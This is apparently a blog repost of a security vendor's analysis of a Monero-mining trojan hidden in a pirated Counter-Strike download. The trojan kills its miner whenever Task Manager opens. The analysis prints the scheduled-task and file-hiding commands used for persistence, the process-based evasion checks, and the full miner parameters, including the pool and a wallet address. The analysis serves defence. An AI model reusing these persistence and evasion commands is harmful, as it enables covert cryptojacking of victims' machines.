欢迎您的到来
ebai.cf

跟用户玩躲猫猫的挖矿木马

今日诗词

一:木马概述

360安全中心近期监控到一类挖矿木马非常活跃,近一周拦截量高达数万次,该木马通过捆绑打包在游戏中,使用户下载运行后中招,有趣的是该木马循环监控任务管理器,一旦发现用户开任务管理器查看CPU进程占用则退出挖矿进程,跟用户玩起了躲猫猫游戏,我们将其命名为NvokaBatMiner。

二:木马分析

木马来源主要是用户下载各种游戏运行而中招。

典型的路径信息为

%userprofile%\documents\counter-strike_1.6.exe

木马批处理被打包捆绑nvoka22.bat隐藏在游戏中,然后被hl.exe启动

跟用户玩躲猫猫的挖矿木马

批处理会把带密码为w的自解压文件进行运行,木马运行释放到C:\ProgramData\SystemIdle.exe再启动。

跟用户玩躲猫猫的挖矿木马

SystemIdle.exe运行后调用WinExec创建多个计划任务启动项,设置文件属性隐藏自身,部分参数有:

schtasks /create /tn \Windowss\Data\ServiceRun /tr “C:\ProgramData\SystemIdle.exe” /st 00:00 /sc once /du 9999:59 /ri 1 /f

attrib +s +h “C:\ProgramData\SystemIdle.exe

attrib +s +h %userprofile%\AppData\Roaming\Windows

跟用户玩躲猫猫的挖矿木马

跟用户玩躲猫猫的挖矿木马

木马把VBS和木马本身添加多个计划任务启动项,其中下图ASCII.bin和SystemIdel.exe文件其实相同,只是名字不同,Roamer.exe的作用是从s.txt中读取文件路径,然后启动它,也就是给木马创造多个启动机会,防止木马本身被杀。

跟用户玩躲猫猫的挖矿木马

和上面相同,另外两处计划任务依然是通过调起VBS来启动木马。

跟用户玩躲猫猫的挖矿木马

跟用户玩躲猫猫的挖矿木马

木马运行挖矿前会枚举检测进程中是否有attrib.exe、Taskmgr.exe、taskmgr.exe、ProcessHacker.exe,有则退出,没有则创建attrib.exe进程注入XMR开源的挖矿程序进行挖矿。

然后会循环枚举进程中是否有Taskmgr.exe进程(任务管理器),如果发现有,则杀死挖矿进程,可想而知,如果用户中毒后会发现机器很卡,想使用任务管理器查看有什么进程异常,一旦用户打开任务管理器,木马就会发现并杀死挖矿进程,这时候机器就不卡了,防止用户查出木马。

跟用户玩躲猫猫的挖矿木马

跟用户玩躲猫猫的挖矿木马

注入attribute.exe的程序是使用XMR开源挖矿代码编译,挖矿参数:

-o pool.monero.hashvault.pro:3333

-u 49JRNtdhGLyPcpYEFQfwZD7f2yeDJRbPRDwGqMN9zwdw6xYCt7P3Tsq2ouokBH7ZuGZtW9e8Du8b2LKYZztzheyEKAS1VTK

-p workers

-k –cpu-priority=1 –max-cpu-usage=50 –donate-level=1

跟用户玩躲猫猫的挖矿木马

三:安全提醒

近期挖矿木马非常活跃,让人防不胜防。建议用户及时打上系统补丁,一旦发现电脑卡慢等异常情况请立即使用安全软件扫描。同时也请注意保证安全软件的常开以进行防御,一旦受诱导而不慎中招,尽快使用360安全卫士查杀清除木马。

此外,360安全卫士已经推出了挖矿木马防护功能,

全面防御从各种渠道入侵的挖矿木马。用户开启了该功能后,360安全卫士将会实时拦截各类挖矿木马的攻击,为用户计算机安全保驾护航。

跟用户玩躲猫猫的挖矿木马

打赏
未经允许不得转载:壹佰咖啡馆-ebai.cf » 跟用户玩躲猫猫的挖矿木马
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏